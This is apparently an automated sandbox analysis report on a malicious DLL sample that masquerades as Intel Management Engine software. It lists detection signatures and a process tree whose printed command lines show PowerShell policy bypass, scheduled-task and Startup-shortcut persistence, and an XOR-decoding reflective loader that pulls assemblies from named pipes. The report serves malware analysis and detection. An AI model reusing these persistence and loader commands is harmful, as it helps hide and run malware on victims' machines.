Edit tour
Windows
Analysis Report
JkICQ13OOY.dll
Overview
General Information
| Sample name: | JkICQ13OOY.dll (renamed file extension from exe to dll, renamed because original name is a hash value) |
| Original sample name: | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25.dll.exe |
| Analysis ID: | 1576677 |
| MD5: | cf174c5741c4dce62fb76c183b5b36d5 |
| SHA1: | b982d92cac5d045a983b16033c701e59be93f133 |
| SHA256: | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25 |
| Tags: | exeuser-JAMESWT_MHT |
| Infos: |  |
 | |
Detection
| Score: | 80 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Bypasses PowerShell execution policy
Powershell creates an autostart link
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
loaddll64.exe (PID: 2792 cmdline: loaddll64. exe "C:\Us ers\user\D esktop\JkI CQ13OOY.dl l" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52) 
conhost.exe (PID: 2052 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6720 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\JkI CQ13OOY.dl l",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
rundll32.exe (PID: 4232 cmdline: rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",#1 MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 2192 cmdline:
rundll32.e xe C:\User s\user\Des ktop\JkICQ 13OOY.dll, DllMainer MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 5156 cmdline:
rundll32.e xe C:\User s\user\Des ktop\JkICQ 13OOY.dll, DllMainerI nstall MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 4508 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 6656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6936 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_Hel per /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 5796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5728 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_OnL ogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 3560 cmdline: "powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_OnLogO nDaily\" / xml \"C:\U sers\user\ AppData\Lo cal\task.x ml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5636 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7200 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_OnL ogOnDaily /xml C:\Us ers\user\A ppData\Loc al\task.xm l MD5: 76CD6626DD8834BD4A42E6A565104DC2) - powershell.exe (PID: 7236 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_Helper \" /xml \" C:\Users\u ser\AppDat a\Local\ta sk.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7452 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_Hel per /xml C :\Users\us er\AppData \Local\tas k.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2) - rundll32.exe (PID: 7340 cmdline:
rundll32.e xe C:\User s\user\Des ktop\JkICQ 13OOY.dll, DllMainerI nstallUser Only MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 7492 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7552 cmdline:
"powershel l.exe" -No Profile -E xecutionPo licy Bypas s -Command $WSc riptShell = New-Obje ct -ComObj ect WScrip t.Shell $Shortcu t = $WScri ptShell.Cr eateShortc ut('C:\Use rs\user\Ap pData\Roam ing/Micros oft/Window s/Start Me nu/Program s/Startup/ IntelManag ementuser. lnk') $Shortcut. TargetPath = 'powers hell.exe' $Short cut.Descri ption = 'T he Intel M anagement user (ME) is an embe dded micro controller running o n a dedica ted microp rocessor i ntegrated into Intel chipsets. ' $Sho rtcut.Argu ments = '- NoProfile -Execution Policy Byp ass -Comma nd C:\Wind ows\System 32\rundll3 2.exe "C:\ Users\user \AppData\R oaming/Int elManageme ntUnit/Mai ner.dll",D llMainerUs erOnly' $Shortcu t.WindowSt yle = 7 $Shortcu t.Save() MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7688 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine r MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7696 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rInstall MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 7524 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 3784 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_Hel per /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 2812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7208 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_OnL ogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 8100 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7280 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_OnLogO nDaily\" / xml \"C:\U sers\user\ AppData\Lo cal\task.x ml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 8068 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_OnL ogOnDaily /xml C:\Us ers\user\A ppData\Loc al\task.xm l MD5: 76CD6626DD8834BD4A42E6A565104DC2) - powershell.exe (PID: 7868 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_Helper \" /xml \" C:\Users\u ser\AppDat a\Local\ta sk.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7948 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7272 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_Hel per /xml C :\Users\us er\AppData \Local\tas k.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2) - rundll32.exe (PID: 7704 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rInstallUs erOnly MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 7104 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 3620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7300 cmdline:
"powershel l.exe" -No Profile -E xecutionPo licy Bypas s -Command $WSc riptShell = New-Obje ct -ComObj ect WScrip t.Shell $Shortcu t = $WScri ptShell.Cr eateShortc ut('C:\Use rs\user\Ap pData\Roam ing/Micros oft/Window s/Start Me nu/Program s/Startup/ IntelManag ementuser. lnk') $Shortcut. TargetPath = 'powers hell.exe' $Short cut.Descri ption = 'T he Intel M anagement user (ME) is an embe dded micro controller running o n a dedica ted microp rocessor i ntegrated into Intel chipsets. ' $Sho rtcut.Argu ments = '- NoProfile -Execution Policy Byp ass -Comma nd C:\Wind ows\System 32\rundll3 2.exe "C:\ Users\user \AppData\R oaming/Int elManageme ntUnit/Mai ner.dll",D llMainerUs erOnly' $Shortcu t.WindowSt yle = 7 $Shortcu t.Save() MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7720 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",Dummy MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7732 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DotNetRu ntimeDebug Header MD5: EF3179D498793BF4234F708D3BE28633) 
WerFault.exe (PID: 2444 cmdline: C:\Windows \system32\ WerFault.e xe -u -p 7 732 -s 380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - rundll32.exe (PID: 7744 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rUserOnly MD5: EF3179D498793BF4234F708D3BE28633) - powershell.exe (PID: 7564 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "Write-Hos t 'Dummy p rocess sta rted. Pres s Ctrl+C t o exit.'; while ($tr ue) { try { Start-Sl eep -Secon ds 1 } cat ch { Write -Host 'Clo se signal received. Exiting... '; break } }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7240 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7904 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "function Load-Assem bly($asmBy tes) { # XOR the assembly byte array $xorK ey = 164 [byte[] ] $decoded Bytes = Ne w-Object b yte[] $asm Bytes.Leng th for ($i = 0; $i -l t $asmByte s.Length; $i++) { $decod edBytes[$i ] = $asmBy tes[$i] -b xor $xorKe y } # Load the assemb ly from th e modified byte arra y $ass embly = [S ystem.Refl ection.Ass embly]::Lo ad($decode dBytes) # Searc h for a Pr ogram clas s and a Ma in method to invoke $progr amType = $ assembly.G etType(\"P rogram\", $false) if ($pro gramType - ne $null) { $m ainMethod = $program Type.GetMe thod(\"Mai n\", [Syst em.Reflect ion.Bindin gFlags] \" Static,Pub lic,NonPub lic\") if ($ma inMethod - ne $null - and $mainM ethod.GetP arameters( ).Length - eq 1 -and $mainMetho d.GetParam eters()[0] .Parameter Type -eq [ string[]]) { $argument s = [Syste m.String[] ]@(\"--pow ershell\") $ mainMethod .Invoke($n ull, [Syst em.Object[ ]]@(,$argu ments)) } else { #th row \"No e ntry point found.\"; } } e lse { #throw \ "Program c lass not f ound.\"; } } $a = [System.R eflection. Assembly]: :LoadFrom( \"C:\Users \user\AppD ata\Roamin g\IntelMan agementUni t\FSharp.C ore.All.dl l\"); $in_pipe = New-Obje ct System. IO.Pipes.N amedPipeCl ientStream (\"GLSXQXR VFAHVDEQYP RSDVGLAEEF HUSGJKSWIU JCYTRNPAMD OUHMAIYAEE BPXFFTUYFA CQTGLCVYRN SSHYWFWFOK LAJSVUCDOK GIGITRSISP PMSNOBNSJH LJGXIPDNLB S\"); $i n_pipe.Con nect(); # Get the current pr ocess ID $processI d = [Syste m.Diagnost ics.Proces s]::GetCur rentProces s().Id # Conver t the proc ess ID to byte array $bytes = [System. BitConvert er]::GetBy tes($proce ssId) # Assumin g $in_pipe is a Syst em.IO.Pipe s.PipeStre am or simi lar # Yo u would wr ite the by te array t o it like this: $i n_pipe.Wri te($bytes, 0, $bytes .Length) $in_pipe. Flush() $buffer = new-object byte[] 98 616;$rrrr= $in_pipe.R ead($buffe r, 0, $buf fer.Length );$aaaa=Lo ad-Assembl y($buffer) ;;;;$buffe r = new-ob ject byte[ ] 156160;$ rrrr=$in_p ipe.Read($ buffer, 0, $buffer.L ength);$aa aa=Load-As sembly($bu ffer);;;;$ buffer = n ew-object byte[] 215 04;$rrrr=$ in_pipe.Re ad($buffer , 0, $buff er.Length) ;$aaaa=Loa d-Assembly ($buffer); ;;;" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1012 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "function Load-Assem bly($asmBy tes) { # XOR the assembly byte array $xorK ey = 164 [byte[] ] $decoded Bytes = Ne w-Object b yte[] $asm Bytes.Leng th for ($i = 0; $i -l t $asmByte s.Length; $i++) { $decod edBytes[$i ] = $asmBy tes[$i] -b xor $xorKe y } # Load the assemb ly from th e modified byte arra y $ass embly = [S ystem.Refl ection.Ass embly]::Lo ad($decode dBytes) # Searc h for a Pr ogram clas s and a Ma in method to invoke $progr amType = $ assembly.G etType(\"P rogram\", $false) if ($pro gramType - ne $null) { $m ainMethod = $program Type.GetMe thod(\"Mai n\", [Syst em.Reflect ion.Bindin gFlags] \" Static,Pub lic,NonPub lic\") if ($ma inMethod - ne $null - and $mainM ethod.GetP arameters( ).Length - eq 1 -and $mainMetho d.GetParam eters()[0] .Parameter Type -eq [ string[]]) { $argument s = [Syste m.String[] ]@(\"--pow ershell\") $ mainMethod .Invoke($n ull, [Syst em.Object[ ]]@(,$argu ments)) } else { #th row \"No e ntry point found.\"; } } e lse { #throw \ "Program c lass not f ound.\"; } } $a = [System.R eflection. Assembly]: :LoadFrom( \"C:\Users \user\AppD ata\Roamin g\IntelMan agementUni t\FSharp.C ore.All.dl l\"); $in_pipe = New-Obje ct System. IO.Pipes.N amedPipeCl ientStream (\"LXUACJG CHJQDEYDGS NQXYJQGFJM GQKRJPWRHK FILVEKMQAQ LQIGQRGMOG MXGBBDBLKM WPJKULMBQP XWHUFCXYTK CBESBUWOKF PHBSEPSYYA UBJXTYXPNJ DXVBPCECGS P\"); $i n_pipe.Con nect(); # Get the current pr ocess ID $processI d = [Syste m.Diagnost ics.Proces s]::GetCur rentProces s().Id # Conver t the proc ess ID to byte array $bytes = [System. BitConvert er]::GetBy tes($proce ssId) # Assumin g $in_pipe is a Syst em.IO.Pipe s.PipeStre am or simi lar # Yo u would wr ite the by te array t o it like this: $i n_pipe.Wri te($bytes, 0, $bytes .Length) $in_pipe. Flush() $buffer = new-object byte[] 98 616;$rrrr= $in_pipe.R ead($buffe r, 0, $buf fer.Length );$aaaa=Lo ad-Assembl y($buffer) ;;;;$buffe r = new-ob ject byte[ ] 156160;$ rrrr=$in_p ipe.Read($ buffer, 0, $buffer.L ength);$aa aa=Load-As sembly($bu ffer);;;;$ buffer = n ew-object byte[] 189 44;$rrrr=$ in_pipe.Re ad($buffer , 0, $buff er.Length) ;$aaaa=Loa d-Assembly ($buffer); ;;;" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4188 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "function Load-Assem bly($asmBy tes) { # XOR the assembly byte array $xorK ey = 164 [byte[] ] $decoded Bytes = Ne w-Object b yte[] $asm Bytes.Leng th for ($i = 0; $i -l t $asmByte s.Length; $i++) { $decod edBytes[$i ] = $asmBy tes[$i] -b xor $xorKe y } # Load the assemb ly from th e modified byte arra y $ass embly = [S ystem.Refl ection.Ass embly]::Lo ad($decode dBytes) # Searc h for a Pr ogram clas s and a Ma in method to invoke $progr amType = $ assembly.G etType(\"P rogram\", $false) if ($pro gramType - ne $null) { $m ainMethod = $program Type.GetMe thod(\"Mai n\", [Syst em.Reflect ion.Bindin gFlags] \" Static,Pub lic,NonPub lic\") if ($ma inMethod - ne $null - and $mainM ethod.GetP arameters( ).Length - eq 1 -and $mainMetho d.GetParam eters()[0] .Parameter Type -eq [ string[]]) { $argument s = [Syste m.String[] ]@(\"--pow ershell\") $ mainMethod .Invoke($n ull, [Syst em.Object[ ]]@(,$argu ments)) } else { #th row \"No e ntry point found.\"; } } e lse { #throw \ "Program c lass not f ound.\"; } } $a = [System.R eflection. Assembly]: :LoadFrom( \"C:\Users \user\AppD ata\Roamin g\IntelMan agementUni t\FSharp.C ore.All.dl l\"); $in_pipe = New-Obje ct System. IO.Pipes.N amedPipeCl ientStream (\"MKVJMXB CRWWOUVEMT DUWQIHXBQG AJWWVNHRKQ RRWQFJJKQL QDUAMSCSMT RQMPIGQMRU XJCBJAWINP SYTEBWUSBX LEFTCFYAER PGJYGUJVRK AINIJYABRU TKDFRYTLNA F\"); $i n_pipe.Con nect(); # Get the current pr ocess ID $processI d = [Syste m.Diagnost ics.Proces s]::GetCur rentProces s().Id # Conver t the proc ess ID to byte array $bytes = [System. BitConvert er]::GetBy tes($proce ssId) # Assumin g $in_pipe is a Syst em.IO.Pipe s.PipeStre am or simi lar # Yo u would wr ite the by te array t o it like this: $i n_pipe.Wri te($bytes, 0, $bytes .Length) $in_pipe. Flush() $buffer = new-object byte[] 98 616;$rrrr= $in_pipe.R ead($buffe r, 0, $buf fer.Length );$aaaa=Lo ad-Assembl y($buffer) ;;;;$buffe r = new-ob ject byte[ ] 3887104; $rrrr=$in_ pipe.Read( $buffer, 0 , $buffer. Length);$a aaa=Load-A ssembly($b uffer);;;; " MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4208 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7756 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rSmartAndS ilent MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7680 cmdline:
rundll32.e xe Mainer. dll,Dummy MD5: EF3179D498793BF4234F708D3BE28633)
- svchost.exe (PID: 7612 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Christopher Peacock '@securepeacock', SCYTHE: | ||
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||